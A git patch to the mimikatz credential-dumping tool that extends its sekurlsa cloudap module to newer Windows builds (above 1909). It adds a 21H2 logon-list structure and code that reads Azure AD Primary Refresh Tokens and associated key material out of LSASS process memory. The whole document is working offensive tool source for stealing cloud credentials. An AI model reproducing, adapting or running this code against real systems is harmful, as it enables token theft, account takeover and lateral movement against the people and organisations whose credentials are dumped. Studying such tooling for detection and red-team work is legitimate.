From da34c29e45c7fb9f993e953c637c434c22245080 Mon Sep 17 00:00:00 2001 From: dbienstock Date: Thu, 7 Jul 2022 17:27:48 -0400 Subject: [PATCH] cloudap support for versions > 1909. sort of hacky --- .../packages/kuhl_m_sekurlsa_cloudap.c | 92 ++++++++++++++----- .../packages/kuhl_m_sekurlsa_cloudap.h | 16 +++- 2 files changed, 83 insertions(+), 25 deletions(-) diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c index dd5729f..435f36b 100644 --- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c +++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c @@ -29,45 +29,89 @@ NTSTATUS kuhl_m_sekurlsa_cloudap(int argc, wchar_t * argv[]) void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) { - KIWI_CLOUDAP_LOGON_LIST_ENTRY logon; + KIWI_CLOUDAP_CACHE_LIST_ENTRY cache; KIWI_CLOUDAP_CACHE_UNK unk; - KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem}; + KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, pData->cLsass->hLsassMem}; KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0}; if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL)) { aLsassMemory.address = CloudApGlobalLogonSessionList; - if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId)) + if (pData->cLsass->osContext.BuildNumber > KULL_M_WIN_BUILD_10_1909) { - if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY))) + KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 logon; + KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; + if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, LocallyUniqueIdentifier), pData->LogonId)) { - if(logon.cacheEntry) + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2))) { - aLocalMemory.address = &cache; - aLsassMemory.address = logon.cacheEntry; - if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY))) + if(logon.cacheEntry) { - kprintf(L"\n\t Cachedir : %s", cache.toname); - if(cache.cbPRT && cache.PRT) + aLocalMemory.address = &cache; + aLsassMemory.address = logon.cacheEntry; + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY))) { - creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT; - creds.UserName.Buffer = (PWSTR) cache.PRT; - } - - if(cache.toDetermine) - { - aLocalMemory.address = &unk; - aLsassMemory.address = cache.toDetermine; - if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK))) + kprintf(L"\n\t Cachedir : %s", cache.toname); + if(cache.cbPRT && cache.PRT) { - kprintf(L"\n\t Key GUID : "); - kull_m_string_displayGUID(&unk.guid); - creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize; - creds.Password.Buffer = (PWSTR) unk.unk; + creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT; + creds.UserName.Buffer = (PWSTR) cache.PRT; } + + if(cache.toDetermine) + { + aLocalMemory.address = &unk; + aLsassMemory.address = cache.toDetermine; + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK))) + { + kprintf(L"\n\t Key GUID : "); + kull_m_string_displayGUID(&unk.guid); + creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize; + creds.Password.Buffer = (PWSTR) unk.unk; + } + } + kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT); + } + } + } + } + } + else + { + KIWI_CLOUDAP_LOGON_LIST_ENTRY logon; + KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; + if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId)) + { + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY))) + { + if(logon.cacheEntry) + { + aLocalMemory.address = &cache; + aLsassMemory.address = logon.cacheEntry; + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY))) + { + kprintf(L"\n\t Cachedir : %s", cache.toname); + if(cache.cbPRT && cache.PRT) + { + creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT; + creds.UserName.Buffer = (PWSTR) cache.PRT; + } + + if(cache.toDetermine) + { + aLocalMemory.address = &unk; + aLsassMemory.address = cache.toDetermine; + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK))) + { + kprintf(L"\n\t Key GUID : "); + kull_m_string_displayGUID(&unk.guid); + creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize; + creds.Password.Buffer = (PWSTR) unk.unk; + } + } + kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT); } - kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT); } } } diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h index 7b20f46..89f3fdd 100644 --- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h +++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h @@ -90,4 +90,18 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 { DWORD unk6; PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry; // ... -} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11; \ No newline at end of file +} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11; + +typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 { + struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Flink; + struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Blink; + DWORD unk0; + DWORD unk1; + DWORD unk2; + LUID LocallyUniqueIdentifier; + DWORD unk3; + DWORD64 unk4; + DWORD64 unk5; + PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry; + // ... +} KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, * PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2; \ No newline at end of file